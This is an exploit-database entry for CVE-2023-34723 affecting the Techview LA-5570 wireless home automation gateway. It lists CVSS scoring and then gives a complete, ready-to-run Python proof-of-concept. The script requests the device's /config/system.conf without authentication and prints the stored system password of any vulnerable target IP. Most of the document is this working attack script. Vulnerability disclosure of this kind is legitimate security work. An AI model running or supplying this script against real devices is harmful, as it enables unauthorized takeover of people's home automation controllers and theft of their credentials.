Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities

2023-09-1100:00:00

The Security Team

0day.today

133

techview la-5570

wireless gateway

automation controller

multiple vulnerabilities

directory traversal

credentials retrieval

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.008

Percentile

82.2%

JSON

# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
# Google Dork: N/A
# Date: 25/08/2023
# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
# Software Link: N/A
# Version: 1.0.19_T53
# Tested on: MACOS/Linux
# CVE : CVE-2023-34723
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725

#!/opt/homebrew/bin/python3

import requests
import sys
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from colorama import init
from colorama import Fore, Back, Style
import re
import os
import ipaddress
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def banner():
    if os.name == 'posix':
        clr_cmd = ('clear')
    elif os.name == 'nt':
        clr_cmd = ('cls')
    os.system(clr_cmd)
    print ("[+]****************************************************[+]")
    print (" | Author      : The Security Team                      |")
    print (" | Company     : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
    print (" | Description : TechVIEW LA-5570 Directory Traversal   |")
    print (" | Usage       : "+sys.argv[0]+" <target>              |")   
    print ("[+]****************************************************[+]")

def usage():
    print (f"Usage: {sys.argv[0]} <target>")

def main(target):
    domain = "http://"+target+"/config/system.conf"
    try:
        url = domain.strip()
        r = requests.get(url, verify=False, timeout=3)
        print ("[+] Retrieving credentials", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        sleep(1)
        print(" .", flush=True, end='')
        if ("system_password" in r.text):
            data =  (r.text.split("\n"))
            print (f"\n{data[1]}")
        else:
            print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
    except TimeoutError:
        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
    except KeyboardInterrupt:
        return
    except requests.exceptions.Timeout:
        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
        return
        
if __name__ == '__main__':
    if len(sys.argv)>1:
        banner()
        target = sys.argv[1]
        try:
            validate = ipaddress.ip_address(target)
            if (validate):
                main (target)
        except ValueError as e:
            print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL) 
    else:
        print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)